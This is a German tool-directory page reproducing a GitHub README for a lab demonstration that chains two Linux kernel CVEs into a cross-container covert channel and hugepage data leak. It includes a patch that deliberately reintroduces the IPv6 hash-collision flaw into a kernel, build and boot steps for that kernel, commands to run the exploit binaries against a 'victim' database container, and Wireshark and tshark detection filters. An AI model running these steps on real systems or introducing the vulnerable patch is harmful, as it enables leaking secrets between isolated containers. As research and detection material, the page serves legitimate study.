Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-1206-CVE-2025-40040-CVE-2024-49882 — 3 Linux-Kernel-Bug-Ketten, um eine sichere Kommunikations-App unter Verwendung eines Seitenkanals zur SchlüsseleƟerung und zur Einrichtung eines verdeckten Kanals zu betreiben; | Kitploit
Tools/GitHubGitHub/spiralbl0ck/cve-2023-1206-cve-2025-40040-cve-2024-49882
Container-SicherheitExploitationDatenexfiltrationNetzwerksicherheitContainer-AusbruchBinary-Exploitation
GitHubspiralbl0ck/cve-2023-1206-cve-2025-40040-cve-2024-49882

CVE-2023-1206-CVE-2025-40040-CVE-2024-49882

3 Linux-Kernel-Bug-Ketten, um eine sichere Kommunikations-App unter Verwendung eines Seitenkanals zur SchlüsseleƟerung und zur Einrichtung eines verdeckten Kanals zu betreiben;

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
12419vor 10 MonatenNoch nicht geprüft

Kombinierter verdeckter Kanal: CVE-2023-1206 + CVE-2024-49882

Übersicht

Dieses Projekt demonstriert einen verdeckten Kommunikationskanal unter Verwendung von zwei Linux-Kernel-Schwachstellen:

KomponenteCVEZweck
Sync-KanalCVE-2023-1206Taktsynchronisation mittels IPv6-Hash-Kollisions-Timing
DatenkanalCVE-2024-49882Container-übergreifende Datenübertragung durch Hugepage-Leaks
┌─────────────────────────────────────────────────────────────────────┐
│                    Non-ENCRYPTED COVERT CHANNEL                     │
├─────────────────────────────────────────────────────────────────────┤
│  Container A (Sender)              Container B (Receiver)           │
│  ┌─────────────────┐               ┌─────────────────┐              │
│  │ 1. Write data   │               │ 4. Detect sync  │              │
│  │    to hugepage  │               │    preamble     │              │
│  └────────┬────────┘               └────────┬────────┘              │
│           │                                 │                        │
│           ▼                                 ▼                        │
│  ┌─────────────────┐   IPv6 Hash   ┌─────────────────┐              │
│  │ 2. Send sync    │──Collision───▶│ 5. Measure      │              │
│  │    preamble     │    Timing     │    latency      │              │
│  └────────┬────────┘               └────────┬────────┘              │
│           │                                 │                        │
│           ▼                                 ▼                        │
│  ┌─────────────────┐   Hugepage    ┌─────────────────┐              │
│  │ 3. Release      │───Reuse──────▶│ 6. Capture      │              │
│  │    hugepage     │               │    leaked data  │              │
│  └─────────────────┘               └─────────────────┘              │
└─────────────────────────────────────────────────────────────────────┘

Voraussetzungen

1. Kernel-Einrichtung (CVE-2023-1206)

Sie benötigen Kernel 6.12 mit der wieder eingeführten Schwachstelle:

# Clone kernel source
cd ~
git clone --depth=1 --branch v6.12 https://github.com/torvalds/linux.git linux-6.12
cd linux-6.12

# Apply vulnerability patch
cat << 'EOF' > /tmp/vuln_patch.patch
--- a/include/net/ipv6.h
+++ b/include/net/ipv6.h
@@ -750,7 +750,12 @@ static inline u32 ipv6_addr_hash(const struct in6_addr *a)
 /* more secured version of ipv6_addr_hash() */
 static inline u32 __ipv6_addr_jhash(const struct in6_addr *a, const u32 initval)
 {
-	return jhash2((__force const u32 *)a->s6_addr32, 4, initval);
+	u32 v = (__force u32)a->s6_addr32[0] ^ (__force u32)a->s6_addr32[1];
+
+	return jhash_3words(v,
+			    (__force u32)a->s6_addr32[2],
+			    (__force u32)a->s6_addr32[3],
+			    initval);
 }
EOF

patch -p1 < /tmp/vuln_patch.patch

# Build and install
cp /boot/config-$(uname -r) .config
make olddefconfig
make -j$(nproc)
sudo make modules_install
sudo make install
sudo update-grub

# Reboot into vulnerable kernel
sudo reboot

2. Hugepage-Einrichtung (CVE-2024-49882)

# Allocate hugepages
echo 256 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages

# Verify
cat /sys/kernel/mm/hugepages/hugepages-2048kB/free_hugepages

# Load udmabuf module
sudo modprobe udmabuf

# Verify /dev/udmabuf exists
ls -la /dev/udmabuf

3. Docker-Einrichtung

# Install Docker with IPv6 support
sudo apt-get update
sudo apt-get install -y docker.io docker-compose

# Enable IPv6 in Docker
sudo cat > /etc/docker/daemon.json << 'EOF'
{
  "ipv6": true,
  "fixed-cidr-v6": "fd00::/80",
  "experimental": true,
  "ip6tables": true
}
EOF

sudo systemctl restart docker

Schnellstart

Alles erstellen

cd ~/covert_channel

# Build on host
make

# Build Docker containers
docker-compose build

Test 1: Überprüfung von CVE-2023-1206 (Sync-Kanal)

# Run collision test
./test_collision

# Expected output:
# [VERWUNDBAR] All addresses hash to same value!
# [KRITISCH] ALLE 1M Adressen landeten in EINEM Bucket!

Test 2: Container-übergreifender Datenleck (CVE-2024-49882)

# Terminal 1: Starte Opfer-Datenbank
docker-compose up victim_db

# Terminal 2: Führe Angreifer aus
docker-compose run --rm attacker
# Innerhalb des Containers:
cd /exploit
./exploit_debug

# Terminal 3: Stoppe Opfer, um Leck auszulösen
docker stop victim_db

# Beobachte Terminal 2 auf durchgesickerte Geheimnisse!

Test 3: Vollständiger verdeckter Kanal

# Terminal 1: Starte Empfänger
docker-compose run --rm receiver
cd /exploit
./covert_channel -r

# Terminal 2: Starte Sender
docker-compose run --rm sender
cd /exploit
./covert_channel -s "SECRET MESSAGE FROM CONTAINER A"

# Beobachte Terminal 1, wie es die Nachricht empfängt!

Wireshark-Analyse

Erfassungseinrichtung

# On host, capture Docker bridge traffic
sudo tcpdump -i docker0 -w covert_channel.pcap

# Or capture specific network
sudo tcpdump -i br-$(docker network ls -q -f name=covert_net) -w covert.pcap

Wireshark-Filter

# Filter for sync channel (IPv6 TCP SYN floods)
ipv6 && tcp.flags.syn == 1 && tcp.flags.ack == 0

# Filter for specific collision bucket traffic
ipv6.dst contains 20:01:0d:b8

# Filter by port
tcp.port == 31337

# Show only connection attempts (no data)
tcp.len == 0 && tcp.flags.syn == 1

# Time-based analysis (connections per second)
# Statistics -> I/O Graphs -> Y Axis: Packets/s

Worauf zu achten ist

  1. Sync-Präambel: Abwechselnde Bursts von SYN-Paketen
    • Hohe Paketrate während '1'-Bits
    • Niedrige/keine Pakete während '0'-Bits
  2. Zeitmuster:
    • ~100ms Bitdauer
    • Bursts von 1000+ Verbindungen
  3. IPv6-Adressmuster:
    • Alle Quelladressen werden dasselbe XOR(addr[0], addr[1]) aufweisen
    • Dies ist die Kollisionssignatur

Wireshark-Lua-Dissector (Optional)

Speichern als ~/.local/lib/wireshark/plugins/covert_channel.lua:

-- Covert Channel Dissector for CVE-2023-1206

local covert_proto = Proto("covert_sync", "CVE-2023-1206 Covert Sync")

local f_collision = ProtoField.bool("covert.collision", "Hash Collision")
local f_bucket = ProtoField.uint32("covert.bucket", "Target Bucket", base.HEX)

covert_proto.fields = { f_collision, f_bucket }

function covert_proto.dissector(buffer, pinfo, tree)
    -- Check for IPv6 TCP SYN
    if pinfo.ipv6_src and pinfo.match_uint("tcp.flags", 0x02) then
        local src = pinfo.ipv6_src
        -- Check for collision pattern
        local a0 = src:get_bytes(0, 4)
        local a1 = src:get_bytes(4, 4)
        -- XOR check would go here
        
        local subtree = tree:add(covert_proto, buffer())
        subtree:add(f_collision, true)
    end
end

-- Register for TCP
local tcp_table = DissectorTable.get("tcp.port")
tcp_table:add(31337, covert_proto)

Visualisierung mit tshark

# Live packet rate graph
tshark -i docker0 -f "tcp port 31337" -q -z io,stat,0.1

# Extract timing data for plotting
tshark -r covert.pcap -T fields -e frame.time_relative -e ipv6.src \
    -Y "tcp.flags.syn==1" > timing_data.csv

# Plot with gnuplot
gnuplot << 'EOF'
set terminal png size 1200,400
set output 'timing_channel.png'
set xlabel 'Time (s)'
set ylabel 'Packets'
set title 'CVE-2023-1206 Covert Sync Channel'
plot 'timing_data.csv' using 1:(1) smooth frequency with impulses
EOF

Fehlerbehebung

Keine Hugepages verfügbar

# Check current allocation
cat /proc/meminfo | grep Huge

# Increase allocation
echo 512 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages

# If fails, try after dropping caches
sync; echo 3 | sudo tee /proc/sys/vm/drop_caches
echo 512 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages

udmabuf nicht verfügbar

# Load module
sudo modprobe udmabuf

# If missing, may need to enable in kernel config
# CONFIG_UDMABUF=m
Tool herunterladen